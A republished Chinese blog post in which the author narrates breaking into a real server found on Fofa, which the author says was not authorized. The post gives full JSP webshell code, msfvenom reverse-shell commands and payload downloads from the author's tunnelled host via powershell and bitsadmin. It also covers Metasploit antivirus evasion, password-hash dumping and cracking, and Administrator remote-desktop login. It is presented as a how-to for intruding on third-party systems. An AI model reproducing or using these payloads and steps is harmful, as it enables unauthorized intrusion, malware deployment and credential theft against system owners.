您当前的位置:首页 > 电脑百科 > 安全防护 > 网络安全

菜鸡的渗透日记

时间:2020-06-19 18:00:35  来源:  作者:

作者:R3gr3t合天智汇

Fofa上找了个站,未授权,所以下文图片打码

漏洞url为:http://ip:port/

1. 弱口令登录

由于一个后台弱口令,才有了下面的渗透过程.

菜鸡的渗透日记

 

试了个弱口令,admin,123456进去了

2. 寻找上传点

最近对文件上传漏洞很敏感,因为文件上传比较方便,可以直接传弹shell

翻了翻,在后台菜单发现了一个“附件管理”的功能

菜鸡的渗透日记

 

选择添加附件

菜鸡的渗透日记

 

然后抓包,由于环境是JAVA+Tomcat+iis,看看能不能上传一个jsp

我首先是上传了一个执行命令并回显的

<%
    if ("023".equals(request.getParameter("pwd"))) {
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b)) != -1) {
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

发包

菜鸡的渗透日记

 

小路径:
http://ip:port/static/tmp/aca388dd-ddf3-48e0-b96a-642a4086e951.jsp?pwd=023&i=whoami

执行whoami命令,当前用户是个nt authoritysystem权限,好事,省的一会还得提权

这下知道了对面是个win,执行dir看一下目录

菜鸡的渗透日记

 

报错了,经测试,无法查看目录,但是可以执行systeminfo

系统是 windows Server 2008 R2 Enterprise,打了208个补丁(还好不用提权)

3. 传马

然后我打算搞一个msf的上去

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

jsp感觉是真的麻烦,只能会连一个cmd,不能回连meterpreter,所以几乎浪费了一晚上的时候 ):

菜鸡的渗透日记

 

然后msf配置好,接shell

菜鸡的渗透日记

 

4. 尝试cmd->meterpreter

cmd对接下来的渗透不方便,想改为meterpreter

问了队里的师傅,说search upgrade一下,有把cmd转换为meterpreter的模块

菜鸡的渗透日记

 

应该是那个
post/multi/manage/shell_to_meterpreter模块没错了

坑点1

问题来了,要想使用其他模块就需要把这个session放到后台去,平常meterpreter的操作都是background,这个cmd我当时就懵了

无意中发现在cmd里也可以使用meterpreter的部分命令,不得不说msf真是强大

菜鸡的渗透日记

 

background放到后台,use
post/multi/manage/shell_to_meterpreter,set SESSION ,然后run

不知道为什么,它就失败了

菜鸡的渗透日记

 

坑点2

下一种方法,搞一个
windows/meterpreter/reverse_tcp的上去,拿msf生成了个

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -e x86/shikata_ga_nai -i 10 -f exe > shell.exe

由于cmd可以使用msf的upload命令,直接执行upload shell.exe shell.exe上去

再一次挺突然的,失败了

菜鸡的渗透日记

 

远程下载文件

powershell

平常都是使用powershell的,所以这次也打算拿它下载

本地搭个web服务,然后用NatApp隧道转发一下,这样就能方便的下载文件了,还能看有没有流量过来

菜鸡的渗透日记

 

然后执行powershell命令,powershell (new-object Net.WebClient).DownloadFile('
http://xxxxxx.natappfree.cc/shell.exe','C:Pathshell.exe')

然后再一次,半天无回显

bitsadmin

还有bitsadmin的下载方法,win7以上可以使用,但是这个环境也是成功了,感觉比powershell好用

bitsadmin /transfer n http://xxxxxx.natappfree.cc/shell.exe C:Pathshell.exe

5. 恶心的杀软

当晚大意了,没注意进程里有没有杀软,一直不上线,本地测试也一直不上线,造成了vps出问题的假象

修了一晚上的vps,才发现是我本地杀软没关,连不上,对方的机子里有杀软,也连不上

tasklist看一下,对方的机子里有腾讯安全管家(由于我的智障操作,导致后来远程桌面连上后,杀软已经报了好几个毒,还好没被发现)

尝试免杀

免杀还是第一次,所以只会拿工具免杀

先是试了shellter,avet,venom,都没过(可能是我工具使用姿势不对)

然后查到了一篇Evasion的免杀,这个免杀是msf的一个模块,在metasploit5.0加入,不得不说msf真是强大

msf5 > use evasion/windows/windows_defender_exe

msf5 evasion(windows/windows_defender_exe) > set payload windows/meterpreter/reverse_tcp

msf5 > set LHOST

msf5 > set LPORT

msf5 > run

然后就会生成一个随机名字的,为了测试,本地下了一个腾讯安全管家

菜鸡的渗透日记

 

这次成功的上线了

6. 尝试抓明文密码

猕猴桃

用msf自带的mimikatz抓明文密码

load mimikatz

kerberos

由于杀软问题,抓不到明文密码

msf自带模块

又是强大的msf起作用了,
post/windows/gather/smart_hashdump模块抓明文密码

菜鸡的渗透日记

 

Administrator的密码是第二个哈希值,第一个是空密码

拿哈希值去cmd5解密,是一条付费的,正好群里有个师傅快到期了,帮解密,成功的拿到明文密码

7. 远程连接

当时直接连上了Administrator的账户,队里师傅说会把别人踢下线

正确操作应该是添加个管理员账号,然后再连

菜鸡的渗透日记

 

小站无内网,渗透结束

相关实验:

Metasploit制作木马后门

https://www.hetianlab.com/expc.do?ec=ECID1932-04d9-4856-88c7-e02fb889edd3

声明:笔者初衷用于分享与普及网络知识,若读者因此作出任何危害网络安全行为后果自负,与合天智汇及原作者无关!



Tags:渗透   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除,谢谢。
▌相关推荐
公众号:白帽子左一 领取配套练手靶场、安全全套课程及工具...前言在日常渗透项目中,app渗透可以说是家常便饭了。但由于安卓7以后不信任用户安装的证书,很多时候无法正常抓取数...【详细内容】
2021-12-07  Tags: 渗透  点击:(31)  评论:(0)  加入收藏
简介在sqlmap基础上增加了目录扫描、hash爆破等功能运行环境 linux 在云服务器上还是蛮不错的项目连接如下https://github.com/s0md3v/sqlmat usage: sqlmate [-h] [--dor...【详细内容】
2021-11-10  Tags: 渗透  点击:(44)  评论:(0)  加入收藏
前言登场的目标虽不是SRC,但是整个漏洞的利用手法很有学习意义。目前在很多大厂的http数据包中都会添加sign值对数据包是否被篡改进行校验,而sign算法的破解往往是我们漏洞测...【详细内容】
2021-11-10  Tags: 渗透  点击:(91)  评论:(0)  加入收藏
一:信息收集阶段因为目标是学校,一般会去考虑收集学号,教工号。因为有的登陆点需要此类信息,且密码存在规律性(身份证后六位,123456)。目标域名xxx.com【查看资料】开始的时候,我是...【详细内容】
2021-10-27  Tags: 渗透  点击:(47)  评论:(0)  加入收藏
一、背景介绍Pikachu是一个带有各种漏洞的Web应用系统,这个系统是使用PHP搭建的,需要PHP环境和Mysql数据库支持。我们可以利用phpstudy在本地搭建这个渗透测试平台,如果你是一...【详细内容】
2021-10-09  Tags: 渗透  点击:(53)  评论:(0)  加入收藏
一、知识点详解msfconsole,进入msf控制端show options,查看设置的ip地址和端口号是否写入run,根据写入的ip地址和端口号,开启监听服务help,在进入安卓手机的控制端,查看可以使用的...【详细内容】
2021-10-08  Tags: 渗透  点击:(63)  评论:(0)  加入收藏
一、准备环境Burpsuite、夜神模拟器二、步骤运行burpsuite,打开代理后,访问 http://burp/ 下载CA证书点击右上角位置下载CA证书将下载的CA证书导入到浏览器中,打开浏览器选择设...【详细内容】
2021-10-08  Tags: 渗透  点击:(67)  评论:(0)  加入收藏
拓扑环境 Kali Linux(攻击机) Centos6.4(web服务器) win7(域成员主机无法上网) win2008R2(域控无法上网) 目的通过Kali Linux拿到域控权限2021最新整理网络安全\渗透测试/安全学习(全...【详细内容】
2021-09-17  Tags: 渗透  点击:(90)  评论:(0)  加入收藏
前言这又是一个关于域内基础概念与原理的系列Active Directory 的查询基础语法BaseDNBaseDN 即基础可分辨名称,其指定了这棵树的根。比如指定 BaseDN 为DC=whoamianony,DC=or...【详细内容】
2021-09-06  Tags: 渗透  点击:(47)  评论:(0)  加入收藏
http 头部信息http头部信息经常包含着主机服务的一些版本信息,经常使用的字段信息有:Server, X-Powered-By, X-AspNet-Version工具可采用curl进行curl --location --head $URL...【详细内容】
2021-08-19  Tags: 渗透  点击:(227)  评论:(0)  加入收藏
▌简易百科推荐
(报告出品方:德勤)数字化转型网络安全及转型挑战在任何行业,保持竞争力都需要快速开发新产品和 服务并推向市场。创新型业务模式不仅仅是简单地将现有 流程数字化,其正在覆盖供应...【详细内容】
2021-12-22  认是    Tags:网络安全   点击:(29)  评论:(0)  加入收藏
10月18号, W3C中网络平台孵化器小组(Web Platform Incubator Community Group)公布了HTML Sanitizer API的规范草案。这份草案用来解决浏览器如何解决XSS攻击问题。 网络安全中...【详细内容】
2021-12-07  实战Java  博客园  Tags:脚本攻击   点击:(20)  评论:(0)  加入收藏
一、背景介绍大家在Linux的日常使用中都晓得如何通过命令行去配置Linux的端口开放规则,但是大家知道如何配置Windows入站出站规则吗?有哪些常见的危险端口呢?如何解决上述问题...【详细内容】
2021-12-01  Kali与编程    Tags:防火墙   点击:(30)  评论:(0)  加入收藏
网络安全服务商Randori公司日前发布了一份调查报告,列出了网络攻击者最有可能攻击或利用的IT资产。在遭遇Solarwinds黑客攻击一周年之际,以及在网络安全(尤其是勒索软件和供应...【详细内容】
2021-10-28  企业网D1net   企鹅号  Tags:网络攻击   点击:(57)  评论:(0)  加入收藏
0x01.背景实验利用Dns Administrators 组成员,通过远程配置Dns服务,进行Dll inject从而实现特权提升。 在域内,Dns server 通常为Dc Server,Dns服务器管理基于rpc,通过调用c:\wi...【详细内容】
2021-10-22  IT影子    Tags:特权提升   点击:(37)  评论:(0)  加入收藏
本文主要介绍和总结了CSRF跨站请求伪造的基本原理和主要防范措施,工作中有用到的朋友不妨收藏转发一下,以备您参考。什么是CSRF?CSRF跨站点请求伪造(Cross&mdash;Site Request...【详细内容】
2021-10-13  快乐中恒    Tags:CSRF   点击:(49)  评论:(0)  加入收藏
waf拦截在打某市 Hvv 第一天就找到一个文件上传的点,经过测试,可以直接任意文件上传,没有什么道理。 直接尝试上传 Php 文件,被 waf 拦截了 2021最新整理网络安全/渗透测试/安...【详细内容】
2021-10-11  KaliMa    Tags:防火墙   点击:(56)  评论:(0)  加入收藏
应用程序与文件系统的交互始终是高度安全敏感的,因为较小的功能漏洞很容易成为可利用漏洞的来源。这种观察在web文件管理器的情况下尤其正确,其作用是复制完整文件系统的功能...【详细内容】
2021-09-17  IT野涵    Tags:漏洞链   点击:(56)  评论:(0)  加入收藏
您的苹果手机尽管iPhone比Android更安全,但也可以通过各种方式入侵。避免黑客入侵的最佳方法是警惕奇怪的链接或粗略的应用程序,并仅在必要时提供信息。电池寿命差和性能低下...【详细内容】
2021-09-16  Hackers爱好者    Tags:黑客入侵   点击:(633)  评论:(0)  加入收藏
防火墙一般布置在逻辑区域的入口处,位于三层网络架构的核心和汇聚之间,起到隔离逻辑区域,为逻辑区域创建安全策略的作用。 上面就是应用区的防火墙布置方式,他布置在应用区,可以...【详细内容】
2021-09-03  知来知去    Tags:主备模式防火墙   点击:(109)  评论:(0)  加入收藏
最新更新
栏目热门
栏目头条